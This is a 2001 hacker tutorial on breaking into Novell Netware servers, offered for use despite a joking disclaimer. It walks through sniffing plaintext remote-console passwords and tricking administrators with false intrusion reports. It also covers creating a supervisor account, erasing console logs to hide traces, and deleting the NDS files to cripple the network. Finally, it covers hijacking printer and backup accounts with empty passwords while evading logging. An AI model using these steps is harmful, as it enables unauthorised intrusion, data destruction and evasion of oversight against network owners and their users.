The
Disclaimer
I don't
encourage illegal activities, I really mean this! And if you really want
to try
something against the law, and you get caught I have warned you, hehe
:p
Introduction
This is
the first tutorial I have wrote. It was intensely only written for BSRF
(Black
Sun Research Facility), and it will be properly not the last one :)
though.
So if you discover some errors, please let me remind you this was my
first
one. Last note before I will begin writing about "Cracking Netware", at
the
moment you can't contact me by e-mail or whatsoever... I rather remain
'hidden', for the
moment.
Index
Novell Netware tutorials:
Novell
Netware - Cracking Netware
Maybe
I'll write an advisory for system administrators or even my own found
vulnerabilities in Netware, but
remember I can't guarantee anything!
It's
possible that I'll write some other tutorials about different topics as
well.
Well
this one will be about:
Novell
Netware - Cracking Netware (v 1.04)
Like
many other Operating Systems Netware original (before 5.xx) doesn't work
with
the TCP protocol, it uses it's own protocol called Internet Packet eXchange
(IPX).
This protocol isn't vulnerable at the moment to any kind of Denial of
Service
(DoS) attacks like SYN-flood, while the TCP protocol is. Because Netware
didn't
get much attention from crackers they thought there system was
impenetrable, and so they didn't
much about security updates. Now many of you
guys
think this is really cool, and think they can crack any Netware server with
some
help from the many tools that are available online. Well, I can tell you
that's
not that easy.
The
most important reason; Which Netware version they run, if running version
4.1 or
higher the change you will sneak in unnoticed will be really small.
Unless
you have to deal with some really lame most times lazy system
administrators.
If the
system administrators patch the Netware server(s) on regular
base...
Also if
you have some kind of permanent account with standard Netware rights,
not one
who's adjusted.
You
will need much time and don't be disturbed. Especially in classrooms this
will be
difficult to get, so you have to find a way with Social Engineering to
accomplish this
:(
Before
I continue with Netware security and how to bypass it, first I'm going to
tell
you something about Servers & Clients.
After a
Netware client in Windows 9x has been installed it's possible to access
the
Netware server. When you arrive in Windows you'll see a login screen. Before
you
have logged into the network the "client <--> server" has already
established a connection with each
other, only this connection isn't validated
by the
user who created the connection! You can see this connection on the
console
when monitor.nlm is loaded. You people don't know what the console
means?
Ok, I'll explain. The server is nothing less but a computer, not a normal
one
like a desktop or tower. No call it a very big tower. On this machine the
Netware
server software is installed, when you turn on this machine first dos
(6.22
or lower) will be loaded. After this you can boot Netware by executing
file
"server.exe", now many files will be loaded and you'll get a lot of
messages. It looks like when you're
booting a Linux machine. After the boot
process
you look at a sort of dos screen, this is called the console. At the
console
you have the highest rights on the particularly Netware server. You can
down
the server any time you want with just one simple command. So the main
group
of crackers tries to get this access. But there are many different ways to
crack a
Netware server. It just depends on what you want to do at the Netware
server.
By
default you have the following rights on a Netware server:
User: Normal user who can access some files in
//public, //login and //mail.
Mostly
they have some print rights too, also have a home
directory.
SuperUser: At school's this
right has been given to teachers. They can view
students accounts
and delete files if necessary. They cannot create,
delete or change
accounts from the NDS.
SuperVisor: Only the system
administrators are permitted to control everything
on the
file system and the NDS. When they want to down the server they have to
walk to
the console, or do it remote by starting a program called rconsole which
stands
for "Remote Console". The word explains itself. For security reasons they
first
have to load "remote.nlm" and "rspx.nlm" at the console. So by default
these
NLM's aren't loaded.
Console: This is the
highest right on a Netware server, once you have gained
this
rights illegal nothing can stop you at the moment but a power failure. Also
be
aware of the log files! Many crackers who have gained console right have been
snapped
by them, and if you are dealing with very smart system administrators,
they
have some program that automatically sends the logs to an off-line
location. And once they have
arrived overthere you have a serious problem...
When
you want to gain some high level access on a Netware server,
remember
that
this can be done in many ways I explain two differents
ways.
A note
before trying one of the two ways. Way one will require a lot of luck,
some
skills of cracking and also some tools. Way two will require a lot of time
(two
weeks maybe a month). You have to see for yourself what's the best way. O
by the
way, if you want to get some high level access while trying way one...
remember it's critically you don't
make any mistakes, because the properbility
you'll
be caught is high (log files and some other things)!
Please
first read the tutorial, before trying one way or another. I really
recommend
it!!!
First
way
If you
are very, and I mean very lucky the system administrators could have
loaded
"remote.nlm & rspx.nlm" on the Netware console. Try to find a program
called
"rconsole.exe", normally you can find this program in the following
directory on the Netware server
"//public". If you haven't file scan or read
rights
on this directory, you have to get this program at another way. The
program
needs alot of other files before you can execute it, so download these
too! To
make it a little harder for our 'beloved' system administrators to trace
you
(and give you more time), don't verify yourself to the server while trying
to
access
the console by remote! Before they know who's trying to establish a
connection to the Netware server,
they have to walk to the server and load
monitor.nlm. Now they can see the
attackers ethernet address, from at this
moment
they can close your connection to the server any time they feel fit. But
mostly
they want to collect some evidence against you, so they just let you
'crack
the
server'. In meantime you have already spend some minutes guessing the
correct
console password, and every attempt has been written automatically to a
logfile. Or even worse, every
attempt has also been written to their monitor
including (again) your ethernet
address, and if you guessed the password right
or not.
This sucks, doesn't it? Well we can combine these two problems into one
solution. But again you'll need
some luck! Here we go:
The
most difficult problem will be getting the password, because you don't have
enough
time to guess the password, even with some kind of bruteforce-crack
program
you haven't, we need to approach this problem from another way. Now
you'll
need some luck because for this trick the following nlm's have to be
loaded:
"remote & rspx" at the console!
The system administrators will only
load
these if they want to check the console (remote) regularly, as I explained
before. Just try to access the console with
"rconsole.exe" to verify if those
nlm's
are loaded, note only try this once! If you get a blue empty window, well
skip to
part two! Well when you are sure those two nlm's are loaded, continue
reading, if not skip to the second
way to crack Novell Netware.
When
the system administrators are accessing the console they also have to enter
a
password. This password is being send in plain text over the network ( plain
text
means: unencrypted). If you're dealing with Netware version 4.11 or
higher,
skip to
way two because the transmitted console password is
encrypted!
When
you have the same node address as the system administrators have, it's
possible to intercept (sniffing)
the packets from the system administrators to
the
console. You are questioning yourself "How do I know?", the answer: If
you're
on a small network with approximately 10-50 users you are on the same
node
address. Unless you're dealing with some paranoid system administrator. If
you're
dealing with some bigger kind of network you have to get yourself a copy
of a
program called "getconn.exe" that reveals the node address of the Netware
server.
Again you do need some luck, if you're not on the same node address as
they
are, skip to way two.
Dont's
make the following mistake: When an user or the system administrator is
logging
into netware, it's completely senceless to 'sniff' this password.
Because
this password is encrypted with RSA encryption. The next time the person
will
(re-)login the encryption will be changed.
We now
arrive at properly the most difficult part of all.
What we
now need is a packetsniffer that supports IPX sniffing, I recommend
"SpyNet" for the job. Install and
execute SpyNet. Configure SpyNet so it will
write
all captured packets to one file. Let the program run a couple of hours,
because
the system administrators have to access the console remote. You can use
your
social engineering skills to speed up this process. One way to do this is
to call
them and say you think someone is trying to crack their network. Don't
sound
to professional because they could suspect you're the one doing something
illegal! Remember when you're
sniffing, and write the packets to disk:
First:
This will take really some network occupence, so if you'll run the
program
to long (a day or more) the system administrator will detect an
intruder... Oohw by the way, if the
network is protected by some intrusion
Detection Programs your sniff
attemps will automaticly reported to the system
administrator's. There are (as
usually) some anti-anti-sniffers. But this is a
whole
other story, so I decided NOT to mention it any further.
Second:
It's almost impossible to write all sniffed packets(frames) to disk,
especially not when the network is
overloaded... also remember your ethernet
card is
10/100 mbit/s, and almost all times the network traffic does exceed
above
this value.
Almost
all sniffers does have an option to only write packets from a specified
address
to disk. This has ofcourse some advantages... (more stealthy and less
disk
space is needed).
Once
you've the packets which contain the password, you have to find a way
yourself to extract the password
from Spynet's logfile. Note, the password is
separated into many packets.
Example: If the password would be "Netware" you'll
could
find the password in this order:
packet
34643: j
packet
34644: 6
packet
34645: n
packet
34646:g
packet
34647: 8
packet
34648: e
packet
34649: f
packet
34650: t
packet
34651:2
packet
34652:w
packet
34653:a
packet
34654: l
packet
34655:r
packet
34656: d
packet
34657: 4
packet
34658:e
packet
34659: v
As you
see, this could take some time before you find it, note netware is not
case
sencetive! When you get the password, access the console remote as soon as
possible and create a supervisor
account. If you don't know how to create one,
just
download burglar.nlm from (blacksun.box.sk) and before trying anything with
the
program, first take a good look at the readme.
When
you're finished with anything you want to do at the Netware server,
remember to erase the logfile!
You'll find the file in the /etc/console.log, you
can
delete this file at the console. Just unload "conlog.nlm" and then load it
again!
Now the old logfile is being overwritten by the new one, if you terminate
the
connection between you and the server your ethernet address will be written
to the
new logfile! So before quitting I suggest
to unload once more the
"conlog.nlm". Now you can quit the
remote session with ALT-F1.
NDS
Addon:
If you
really want to do some damage you have to delete the files where the NDS
(Netware Directory Structure) is
being stored. These four files are located in
an
hidden directory named "/_netware". You can only access this directory from
the
console with the program "monitor.nlm". Remember: If the system
administrator's doesn't have
backup's of these files, they have a really big
problem.
Some
problems i'm aware of:
Nobody
can log into Netware anymore, even the admin can't!
All
information about the users, containers, scripts, printers, bordermanager
are
permently lost!
If
there are multiple Netware servers (almost always) connected to eachother,
who are
sharing one NDS... well they have to install the Netware Server software
again
on all servers.
And the
system administrator's have an hell of a job to backup all data from
console.
I
really recommend and I seriously do, to backup these four files to a
floppydisk, in case you'll get
caught. And if you have a little respect for them
please
send them the disk with those four files anonymously. Because it will
take
weeks to restore everything. I do really mean this!
Second
Way
The
primairy goal here is to gain access to all files and folders at a Netware
server.
This is NOT the same as console access! Note: This way takes very lot of
time
and patience.
When
you have a normal user account on any particularly Netware server, you only
have
read&write&remove rights at your homedirectory. But what you proberly
don't
know is
that you also have some read rights at: //public, //login and //mail.
But you
cannot 'see' these directory's because they aren't mapped to a logically
drive.
I explain... Whenever you have typed in your username and password, the
Netware
server will granted you the rights to all directory's and files the
system
administrators have allowed you. If your homedirectory is at
//home/yourhomedir you have to
browse to //home/yourhomedir to view files over
there..
But if your homedirectory is located somewhere 'deeper' in the
directorystructure , like
//home//school/it/it2/class2c/yourhomedir then it
takes
some time to get to your own directory. So here's where drivemapping comes
along.
When you have created a drivemapping to
//home/school/it/it2/class2c/yourhomedir,
just click onto the specific station
(by
default "z:\") and now you are directly transmitted to yourhomedir. The
local
system administrators have created a login script that will do this task
for you
every time when you're logging into the network. Now you know what drive
mapping
means... So as I told before, by default all users (including normal
users)
have only read access to //public, //login and //mail.To access these
directory's you'll have to create a
drivemapping to them. The most important one
is
//public. In this directory you'll find all sorts of binary files and some
clients
like "rconsole.exe". So, map this
directory to a logically drive for
example
"y:\".
It will
really come in handy if we have some 'other' accounts for the following
part.
Otherwise you'll have to explain to the system administrators what you
were
doing last week in the late afterhours at school or work. In other words we
need a
few other accounts at the netware server. It's really not advisible to
use an
account from a student or college at work, if you know his/her password
ofcourse! The best accounts for the
crack job is one of the printer or backup,
and
most times it has a NULL password! Sounds good, doesn't it? Well I can make
it even
better, remember I told you that ALL users have (by default) read rights
to
//public, //login and //mail? So does these accounts have them too... The
only
problem is to guess the correct usernames. Many Novell Netware tutorials
will
give you some default printer accounts, but many times these accounts
doesn't
exists anymore. So I'm going to explain how to get existing usernames at
your
local Netware server. Here weg go:
First
you'll need to run a binary file at //public/win95/nwclnt95.exe, when all
the
loading work is done you'll see a window like 'explorer' from Windows.
You're
now viewing at the NDS (Netware Directory Structure). Inhere all
information (containers, scripts,
printers & accounts) about the netware server
is
being strored. Search inhere for a name with the word(s) print, printer, ps
or
pservice. It's possible you find multiple printer accounts like printerti,
printersys or psserv. If you didn't
find anything you have to try to get some
accounts a different way, grab a
program called "chknull.exe" made by NOMAD (The
Noturious Netherlands Hacker). This
program will check all existing netware
account
for NULL passwords. If this program didn't find anything, you really
have a
bad day and it's advisible to stop reading this tutorial right here :'(.
If you
did found something, always doublecheck before you are doing anything
(wrong)
with it. You really have to be sure if it's really a printer or
backup...
Now you
have some Netware accounts with NULL passwords we can continue.
Note:
Never change passwords from hijacked accounts, the properbility the system
administrator will discover it, is
way to riscy. And if you change the password
from a
printer, nobody can print anything anymore! You can guess that it only
take a
few hours before the system administrator's will discover the leak. Now
log
into the Netware network with the 'stolen' accountinformation, and if you
are
lucky the system administrator's have granted some dir&filerights. By the
way if
the system administrators are using Netware Bordermanager as Firewall and
/ or
HTTP Gateway you can't surf the web without suffients rights. But most
proberly you can surf the web when
you are logged in as printer (i could)! This
could
come in handy when you need to reach the database from packetstorm for
some
kind of exploit. Nevertheless use HTTP only when it's really necessary!
Because
the firewall will log all requests to the outside world. And we don't
want to
make the job to easy for the system administrator's!
Again I
hadn't enough time to complete this tutorial so I will continue this
subject
in Version 1.04. My problem is always the goddamn time.
Copyright (C) 2001, Data Wizard,
The Netherlands.